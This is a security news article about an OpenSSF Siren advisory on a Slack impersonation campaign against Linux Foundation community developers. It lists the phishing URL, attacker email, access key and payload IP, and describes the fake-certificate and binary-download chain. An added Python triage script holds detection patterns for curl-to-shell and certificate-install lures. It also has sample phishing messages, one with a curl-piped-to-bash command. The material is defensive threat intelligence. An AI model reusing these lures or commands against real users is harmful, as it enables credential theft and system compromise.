A sophisticated social engineering campaign is actively targeting open-source developers via Slack, impersonating trusted Linux Foundation community leaders to deliver malware and achieve full system compromise.
The OpenSSF Siren mailing list published a high-severity advisory on April 7, 2026, warning developers, particularly those active in Linux Foundation workspaces, about a multi-stage attack chain built on impersonation, credential harvesting, and malicious certificate installation.
What Is OpenSSF Siren?
OpenSSF Siren is a public threat intelligence mailing list operated by the Open Source Security Foundation (OpenSSF), itself a Linux Foundation project.
The platform was created to address a critical gap exposed by incidents like the 2024 XZ Utils backdoor: while the open-source ecosystem had mature mechanisms for vulnerability disclosure, it lacked a centralized post-disclosure channel for distributing active threat intelligence to the broader developer community.
Siren fills that gap by publishing indicators of compromise, active attack patterns, and response guidance after initial coordination has already occurred. The April 7 advisory was authored by Christopher “CRob” Robinson, CTO and Chief Security Architect at OpenSSF.
The Attack Chain: Four Stages From Impersonation to Compromise
The campaign targeted the Slack workspace of the TODO Group, a Linux Foundation working group for open source program office (OSPO) practitioners. In the documented incident, an attacker posing as a well-known Linux Foundation community leader sent a direct message to a victim, directing them to click the following URL:
https://sites.google.com/view/workspace-business/join
The use of Google Sites infrastructure is deliberate and tactically significant. Because sites.google.com is legitimate Google infrastructure, the link passes a casual visual inspection and may bypass security filters that block known malicious domains.
Once the victim clicks through, they are walked through a fake authentication flow that harvests their email address and a verification code.
The site then instructs the victim to install a “Google certificate,” which is in reality a malicious root certificate designed to intercept encrypted traffic.
The attack diverges by operating system from this point. On macOS, a script downloads and executes a binary called gapi from a remote IP address (2.26.97.61), with execution potentially resulting in full system compromise.
On Windows, the victim is prompted to install the malicious certificate through a browser trust dialog. In both cases, once the root certificate is trusted, the attacker can intercept HTTPS traffic and potentially harvest credentials, session tokens, and sensitive communications.
The full kill chain involves four distinct stages: impersonation of a trusted community figure, phishing via a socially engineered Slack message, credential harvesting via a fake authentication portal, and malware delivery via a malicious certificate and a remote binary.
The Lure: An AI Tool Pitch Designed for Developers
A Socket engineer who is a member of the TODO Group Slack received the attacker’s direct message firsthand and documented the specific social engineering tactic used.
The attacker, posing as a Linux Foundation leader, pitched what appeared to be an exclusive private tool: an AI-powered system claiming to analyze open source project dynamics and predict which contributions would be merged before any human review occurred.
The pitch leaned heavily on exclusivity, telling the target the tool was “only being shared with a few people for now,” a classic urgency-and-scarcity technique.
The message included the phishing URL alongside a fake email address (cra@nmail.biz) and an access key (CDRX-NM71E8T) designed to make the fake workspace flow appear legitimate and procedurally routine.
The attacker’s account has since been deactivated, consistent with the TODO Group administrators removing it after the advisory circulated.
Weaponizing the Trust Infrastructure of Open Source
What makes this campaign particularly dangerous is not its technical sophistication, but its abuse of the social trust layer that makes open source communities function.
Developers in spaces like the TODO Group routinely receive outreach from recognized names, project leads, foundation staff, and community organizers, and are conditioned to engage with those messages. An attacker who successfully impersonates one of those figures gains a substantial social advantage before a single malicious payload is executed.
This attack does not arrive as an unsolicited email from an unknown sender. It arrives as a Slack DM from someone who looks exactly like a colleague the target has likely interacted with before. That context dramatically lowers psychological defenses.
This campaign also arrives in the wake of a related threat. Last week, researchers documented a coordinated attack targeting high-impact Node.js maintainers, including the leads of Fastify, Lodash, dotenv, and Node.js core, using the same social engineering playbook that previously compromised the Axios project.
Mandiant researchers linked that campaign to a DPRK-nexus threat actor. Whether the two campaigns share infrastructure or attribution remains unconfirmed. Still, a clear pattern is emerging: open source maintainers are being systematically targeted through the very platforms and relationships they depend on to do their work.
Defensive Recommendations From the OpenSSF Advisory
The OpenSSF advisory offers concrete guidance for anyone active in Linux Foundation Slack communities or similar open source spaces. Developers should verify identities out of band, never trust a Slack message based on a username or profile photo alone, and always confirm unusual requests through a separate, known communication channel.
They should never install certificates from links, as legitimate services do not require users to install root certificates manually; any such prompt should be treated as malicious.
Developers should also avoid executing downloaded binaries or scripts, including any file received through Slack or delivered via a redirect, and be especially wary of curl | bash-style execution patterns. Finally, treat all unexpected security or authentication prompts as suspicious until independently verified by your organization’s IT or security team.
If you believe you may have been affected, the advisory recommends disconnecting from the network immediately, removing any newly installed certificates, running endpoint security scans, rotating all credentials, including GitHub tokens and SSH keys, and revoking active sessions and access tokens across cloud services.
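As an added illustration, not part of the OpenSSF advisory or this article, the following Python triage helper shows how a community or security team could screen exported Slack direct messages for the indicators above: the exact IoCs quoted on this page plus the generic warning signs the advisory lists (free Google Sites links, certificate-install requests, curl piped to a shell, exclusivity pressure, out-of-band access keys). The sample messages, sender names and scoring weights are constructed for the example.

```python
import re

# Indicators quoted from the advisory as reported on this page.
KNOWN_IOCS = {
    "https://sites.google.com/view/workspace-business/join": "phishing URL",
    "cra@nmail.biz": "attacker contact address",
    "CDRX-NM71E8T": "fake access key",
    "2.26.97.61": "gapi download host",
}

# Behavioural heuristics derived from the advisory's defensive guidance.
HEURISTICS = [
    (re.compile(r"https?://sites\.google\.com/\S+", re.I), "link on free Google Sites hosting"),
    (re.compile(r"install(?:ing)?\s+(?:a|the)?\s*\w*\s*cert(?:ificate)?\b", re.I), "asks to install a certificate"),
    (re.compile(r"\bcurl\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba)?sh\b", re.I), "curl piped to a shell"),
    (re.compile(r"only\s+(?:being\s+)?shared\s+with\s+(?:a\s+)?few", re.I), "exclusivity pressure"),
    (re.compile(r"\b(?:access|verification)\s+(?:key|code)\b", re.I), "out-of-band access key or code"),
]

# Constructed sample DMs: one modelled on the documented lure, one benign, one generic curl|bash pitch.
LURE = ("Hey! I have a private AI tool that predicts which PRs get merged before any human review. "
        "It's only being shared with a few people for now. Join at "
        "https://sites.google.com/view/workspace-business/join, email cra@nmail.biz, "
        "access key CDRX-NM71E8T. You'll need to install the Google certificate first.")
BENIGN = "Thanks for the review on the OSPO guide PR, I pushed the fixes you asked for."
GENERIC_SUSPICIOUS = "Quick setup: curl https://example.invalid/setup.sh | bash, then install the cert from the link."
SAMPLE_MESSAGES = [("fake-lf-leader", LURE), ("colleague", BENIGN), ("unknown-user", GENERIC_SUSPICIOUS)]

def triage_dm(text):
    """Return (score, reasons) for one message; a known IoC is a definite hit (100),
    otherwise each behavioural heuristic adds 25 so two together reach the review threshold."""
    reasons = []
    lowered = text.lower()
    for ioc, label in KNOWN_IOCS.items():
        if ioc.lower() in lowered:
            reasons.append(f"known IoC ({label}): {ioc}")
    for pattern, label in HEURISTICS:
        if pattern.search(text):
            reasons.append(label)
    score = 100 if any(r.startswith("known IoC") for r in reasons) else 25 * len(reasons)
    return score, reasons

def flag_messages(messages, threshold=50):
    """Return (sender, score, reasons) for every message whose score meets the threshold."""
    flagged = []
    for sender, text in messages:
        score, reasons = triage_dm(text)
        if score >= threshold:
            flagged.append((sender, score, reasons))
    return flagged

if __name__ == "__main__":
    for sender, score, reasons in flag_messages(SAMPLE_MESSAGES):
        print(f"{sender}: score={score}; " + "; ".join(reasons))
```

Flagged messages should be verified out of band with the purported sender, exactly as the advisory recommends, rather than acted on from the score alone.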
FAQ
Q1: What is the phishing URL used in this campaign?
The attackers used https://sites.google.com/view/workspace-business/join, a site hosted on legitimate Google Sites infrastructure, to evade detection.
Q2: Which platforms are affected by the malware payload?
Both macOS (via a remote binary called gapi) and Windows (via a browser certificate trust dialog) are targeted, with macOS carrying the higher risk of full system compromise.
Q3: Is this campaign linked to the recent Node.js maintainer attacks?
Both campaigns use the same social engineering playbook, and the Node.js campaign has been linked to a DPRK-nexus threat actor, but a confirmed connection between the two has not been established.
Q4: What should developers do if they have installed the malicious certificate?
Immediately disconnect from the network, remove the certificate, run an endpoint security scan, rotate all credentials (GitHub, SSH, cloud tokens), and revoke active sessions.
Site: thecybrdef.com